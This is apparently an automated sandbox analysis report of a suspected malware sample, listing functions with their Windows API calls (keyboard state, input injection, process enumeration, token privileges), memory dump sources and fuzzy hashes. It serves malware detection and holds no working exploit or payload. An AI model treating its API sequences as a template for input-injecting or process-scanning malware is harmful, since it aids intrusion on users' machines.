                                                                      • Opcode Fuzzy Hash: 3e3d8a5d38547c5cab148cad6336b9cfc5e419f8129731c88b5319ddaa5acf96
                                                                      • Instruction Fuzzy Hash: 2131C134E55A08EFEB249B74CC35BE83761BB053B2F584012FE199A1E1C7B499889B41
                                                                      Function 00A2AB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetKeyboardState.USER32(?,76C1C0D0,?,00008000), ref: 00A2ABF1
                                                                      • SetKeyboardState.USER32(00000080,?,00008000), ref: 00A2AC0D
                                                                      • PostMessageW.USER32(00000000,00000101,00000000), ref: 00A2AC74
                                                                      • SendInput.USER32(00000001,?,0000001C,76C1C0D0,?,00008000), ref: 00A2ACC6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                      • String ID:
                                                                      • API String ID: 432972143-0
                                                                      • Opcode ID: efb86569349b3a2c141a9b7d634add910a0941f32edc134248d646cdb0c28061
                                                                      • Instruction ID: 34847ba1880eed40669a61601a58a2f5e250783b4dc5f6ca771124da4fb15e06
                                                                      • Opcode Fuzzy Hash: efb86569349b3a2c141a9b7d634add910a0941f32edc134248d646cdb0c28061
                                                                      • Instruction Fuzzy Hash: 84312830A00328AFFF34CBACEC047FE7BB5ABA5320F04423AE485521D1C37489858752
                                                                      Function 00A57674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ClientToScreen.USER32(?,?), ref: 00A5769A
                                                                      • GetWindowRect.USER32(?,?), ref: 00A57710
                                                                      • PtInRect.USER32(?,?,00A58B89), ref: 00A57720
                                                                      • MessageBeep.USER32(00000000), ref: 00A5778C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Rect$BeepClientMessageScreenWindow
                                                                      • String ID:
                                                                      • API String ID: 1352109105-0
                                                                      • Opcode ID: 616fa75ff5c8cb208fc5a363e40995a8520a23e38edd226872ef30ea09a6c07c
                                                                      • Instruction ID: efae6b171dc930fb1a2f46c189f66b6992975a61cf6ab148bdc047b725678e98
                                                                      • Opcode Fuzzy Hash: 616fa75ff5c8cb208fc5a363e40995a8520a23e38edd226872ef30ea09a6c07c
                                                                      • Instruction Fuzzy Hash: 22418D34A09215EFCB02CF98F894EAD77F5FB49316F1540A9E815AB261D730A94ACF90
                                                                      Function 00A516DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetForegroundWindow.USER32 ref: 00A516EB
                                                                        • Part of subcall function 00A23A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00A23A57
                                                                        • Part of subcall function 00A23A3D: GetCurrentThreadId.KERNEL32 ref: 00A23A5E
                                                                        • Part of subcall function 00A23A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00A225B3), ref: 00A23A65
                                                                      • GetCaretPos.USER32(?), ref: 00A516FF
                                                                      • ClientToScreen.USER32(00000000,?), ref: 00A5174C
                                                                      • GetForegroundWindow.USER32 ref: 00A51752
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                      • String ID:
                                                                      • API String ID: 2759813231-0
                                                                      • Opcode ID: 61bb3f80a4a858823ea1793e1a952c5a72bb28acfbf072f67738f7d6bb25e3e5
                                                                      • Instruction ID: a94ff88760457feda7240ba7e420b1ab6f6131c908fad5b1c3fd20b72ce052f4
                                                                      • Opcode Fuzzy Hash: 61bb3f80a4a858823ea1793e1a952c5a72bb28acfbf072f67738f7d6bb25e3e5
                                                                      • Instruction Fuzzy Hash: 83311075D00249AFC700DFA9C981EAEBBF9FF88304B5480A9E415E7251D6359E45CFA1
                                                                      Function 00A2D4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00A2D501
                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00A2D50F
                                                                      • Process32NextW.KERNEL32(00000000,?), ref: 00A2D52F
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00A2D5DC
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                      • String ID:
                                                                      • API String ID: 420147892-0
                                                                      • Opcode ID: 88be9c2f43cd34f7f0da32bc4ffb8fd840ed81b8eac03128af9d0e1e4f050663
                                                                      • Instruction ID: 56528ebedd2d4a22d77aacb92059b198267474063702cf83c45c0d292a782dc8
                                                                      • Opcode Fuzzy Hash: 88be9c2f43cd34f7f0da32bc4ffb8fd840ed81b8eac03128af9d0e1e4f050663
                                                                      • Instruction Fuzzy Hash: BE314B715083009FD301EF64D885FAABBE8EFD9354F14092DF586861A2EB719949CBA3
                                                                      Function 00A58FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 009D9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 009D9BB2
                                                                      • GetCursorPos.USER32(?), ref: 00A59001
                                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00A17711,?,?,?,?,?), ref: 00A59016
                                                                      • GetCursorPos.USER32(?), ref: 00A5905E
                                                                      • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00A17711,?,?,?), ref: 00A59094
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                      • String ID:
                                                                      • API String ID: 2864067406-0
                                                                      • Opcode ID: 95b52762464dbf8b79d83b20abddc7504df1a545d6b8a4af648795590af1e608
                                                                      • Instruction ID: eea132024bd23a67266ad61ed92cab0698fcf3004c893cdeae047ef9143c9b12
                                                                      • Opcode Fuzzy Hash: 95b52762464dbf8b79d83b20abddc7504df1a545d6b8a4af648795590af1e608
                                                                      • Instruction Fuzzy Hash: 4821BF31600118FFCB25CF94CC58EEB3BB9FB89362F004455F9054B2A1C7319951EB61
                                                                      Function 00A2D2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetFileAttributesW.KERNEL32(?,00A5CB68), ref: 00A2D2FB
                                                                      • GetLastError.KERNEL32 ref: 00A2D30A
                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00A2D319
                                                                      • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00A5CB68), ref: 00A2D376
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: CreateDirectory$AttributesErrorFileLast
                                                                      • String ID:
                                                                      • API String ID: 2267087916-0
                                                                      • Opcode ID: 810af2aea0101a005fd83faf4f94b797e1c069ee202d6fe5227585dbf5a4f5c4
                                                                      • Instruction ID: 6a0513c618c4bc49b8dcb81dbc1570f6756f3a8f61754e1e24b916fd03dad38b
                                                                      • Opcode Fuzzy Hash: 810af2aea0101a005fd83faf4f94b797e1c069ee202d6fe5227585dbf5a4f5c4
                                                                      • Instruction Fuzzy Hash: 272180709083119FC300EF68D9859AE77E4FF95324F104A2DF499DB2A2E7309946CB93
                                                                      Function 00A21571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00A21014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00A2102A
                                                                        • Part of subcall function 00A21014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00A21036
                                                                        • Part of subcall function 00A21014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00A21045
                                                                        • Part of subcall function 00A21014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00A2104C
                                                                        • Part of subcall function 00A21014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00A21062
                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00A215BE
                                                                      • _memcmp.LIBVCRUNTIME ref: 00A215E1
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A21617
                                                                      • HeapFree.KERNEL32(00000000), ref: 00A2161E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                      • String ID:
                                                                      • API String ID: 1592001646-0
                                                                      • Opcode ID: 7d54c7e6ca1bf75e3949e56e9cb7fc092ba76fae2b726191c4ce5c81d59e1e52
                                                                      • Instruction ID: 235e40c54be4bbcb513a2abce75bda11699f0cdb9813db51d889f829a6ce064a
                                                                      • Opcode Fuzzy Hash: 7d54c7e6ca1bf75e3949e56e9cb7fc092ba76fae2b726191c4ce5c81d59e1e52
                                                                      • Instruction Fuzzy Hash: 3B216A71E00219EFDF10DFA9D945BEEB7B8FF94355F1844A9E441AB241E730AA05CBA0
                                                                      Function 00A52782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 00A5280A
                                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00A52824
                                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00A52832
                                                                      • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00A52840
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Long$AttributesLayered
                                                                      • String ID:
                                                                      • API String ID: 2169480361-0
                                                                      • Opcode ID: 771321ae989b447c1f09e3fb3f4ef92cae4fa5d9dc587eac94867f4d8a74c34b
                                                                      • Instruction ID: 90935a09ae63e810f7e0e1fd1917fd3269cc0c1b9a1ec4fb7f00e7656074d7f7
                                                                      • Opcode Fuzzy Hash: 771321ae989b447c1f09e3fb3f4ef92cae4fa5d9dc587eac94867f4d8a74c34b
                                                                      • Instruction Fuzzy Hash: 7621C131604211AFD714DB64C845FAA7BA5FF86325F148158F8268B6E2C771FC86C7D0
                                                                      Function 00A278F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00A28D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00A2790A,?,000000FF,?,00A28754,00000000,?,0000001C,?,?), ref: 00A28D8C
                                                                        • Part of subcall function 00A28D7D: lstrcpyW.KERNEL32(00000000,?,?,00A2790A,?,000000FF,?,00A28754,00000000,?,0000001C,?,?,00000000), ref: 00A28DB2
                                                                        • Part of subcall function 00A28D7D: lstrcmpiW.KERNEL32(00000000,?,00A2790A,?,000000FF,?,00A28754,00000000,?,0000001C,?,?), ref: 00A28DE3
                                                                      • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00A28754,00000000,?,0000001C,?,?,00000000), ref: 00A27923
                                                                      • lstrcpyW.KERNEL32(00000000,?,?,00A28754,00000000,?,0000001C,?,?,00000000), ref: 00A27949
                                                                      • lstrcmpiW.KERNEL32(00000002,cdecl,?,00A28754,00000000,?,0000001C,?,?,00000000), ref: 00A27984
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: lstrcmpilstrcpylstrlen
                                                                      • String ID: cdecl
                                                                      • API String ID: 4031866154-3896280584
                                                                      • Opcode ID: 9617d02ebf467ee9bb19279fb81e58741abb458aaf455e0a169c4b40e771dad4
                                                                      • Instruction ID: 6e67bb6a744927d28480a6bdb65a6ad5fa6a9819275e0376f5d3336a16c7d2b2
                                                                      • Opcode Fuzzy Hash: 9617d02ebf467ee9bb19279fb81e58741abb458aaf455e0a169c4b40e771dad4
                                                                      • Instruction Fuzzy Hash: C811E63A200312AFDB159F38E845E7E77A9FF85350B50803AF946CB3A4EB319951C7A1
                                                                      Function 00A57CC2 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00A57D0B
                                                                      • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00A57D2A
                                                                      • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00A57D42
                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00A3B7AD,00000000), ref: 00A57D6B
                                                                        • Part of subcall function 009D9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 009D9BB2
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Long
                                                                      • String ID:
                                                                      • API String ID: 847901565-0
                                                                      • Opcode ID: 454c4e17abbea663f6774d2b4ed9236a12901262674dc85ecd2ede7d2e08400a
                                                                      • Instruction ID: c17e2fd2a3d2c2bc6fd1e307a9bd4ff44b75f9933a1c65ae3ce52353dafdbf5e
                                                                      • Opcode Fuzzy Hash: 454c4e17abbea663f6774d2b4ed9236a12901262674dc85ecd2ede7d2e08400a
                                                                      • Instruction Fuzzy Hash: 1411CD32204615AFCB10DFA8EC44AAA3BA5BF45372B118325FC39E72F0E7319955CB40
                                                                      Function 00A55660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageW.USER32(?,00001060,?,00000004), ref: 00A556BB
                                                                      • _wcslen.LIBCMT ref: 00A556CD
                                                                      • _wcslen.LIBCMT ref: 00A556D8
                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00A55816
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend_wcslen
                                                                      • String ID:
                                                                      • API String ID: 455545452-0
                                                                      • Opcode ID: eb1d90080cbaf7368073c67c26df857b64f32252e68eae97676be6e613d719fc
                                                                      • Instruction ID: c7efe0ccc56c20c57a6595a8288a6265b8b6b4c0405ee27dde6196425fdf2261
                                                                      • Opcode Fuzzy Hash: eb1d90080cbaf7368073c67c26df857b64f32252e68eae97676be6e613d719fc
                                                                      • Instruction Fuzzy Hash: 1511B471E0060496DF20DFB1CC95AEE77BCFF51762B108026FD15D6081E7748A88CBA0
                                                                      Function 009F1D09 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 87184ded072c972463dfc62b76ccd0dac1c424bd5c095f7eaf60a91a155b45db
                                                                      • Instruction ID: a8affd096f236287117c6829937bc3993c4df52602e74f81d9acd85589095ef7
                                                                      • Opcode Fuzzy Hash: 87184ded072c972463dfc62b76ccd0dac1c424bd5c095f7eaf60a91a155b45db
                                                                      • Instruction Fuzzy Hash: 3B014FB2209A1EBEF71116B86CC1F77662DEF817B8B341725F731A11D6DB608C4153A0
                                                                      Function 00A21A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00A21A47
                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00A21A59
                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00A21A6F
                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00A21A8A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID:
                                                                      • API String ID: 3850602802-0
                                                                      • Opcode ID: cc379e2066379b05ab59e8aa2ac3e0a598a6ed20410a073db9a4d25c78abe05d
                                                                      • Instruction ID: ca9b0c819589f2d3312fad1ff4da2430939407d5221c9923e897da6c04598b7c
                                                                      • Opcode Fuzzy Hash: cc379e2066379b05ab59e8aa2ac3e0a598a6ed20410a073db9a4d25c78abe05d
                                                                      • Instruction Fuzzy Hash: D8113C3AD01229FFEB10DBA8CD85FADBB78FB18750F2000A1E600B7290D6716E51DB94
                                                                      Function 00A2E1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00A2E1FD
                                                                      • MessageBoxW.USER32(?,?,?,?), ref: 00A2E230
                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00A2E246
                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00A2E24D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                      • String ID:
                                                                      • API String ID: 2880819207-0
                                                                      • Opcode ID: 4441058a4dae8967f619445262597c2bbef4b09cff413e61cf589a36fd4dfb1c
                                                                      • Instruction ID: 39e5cff70f4d215def3624040955599f5aea32b567684ccc1cc9b07ac3ef5afc
                                                                      • Opcode Fuzzy Hash: 4441058a4dae8967f619445262597c2bbef4b09cff413e61cf589a36fd4dfb1c
                                                                      • Instruction Fuzzy Hash: B111E572A04365FFCB01DBECAC05A9B7BACAB45321F104226F925E7290D670894187A0
                                                                      Function 009ED1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateThread.KERNEL32(00000000,?,009ECFF9,00000000,00000004,00000000), ref: 009ED218
                                                                      • GetLastError.KERNEL32 ref: 009ED224
                                                                      • __dosmaperr.LIBCMT ref: 009ED22B
                                                                      • ResumeThread.KERNEL32(00000000), ref: 009ED249
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
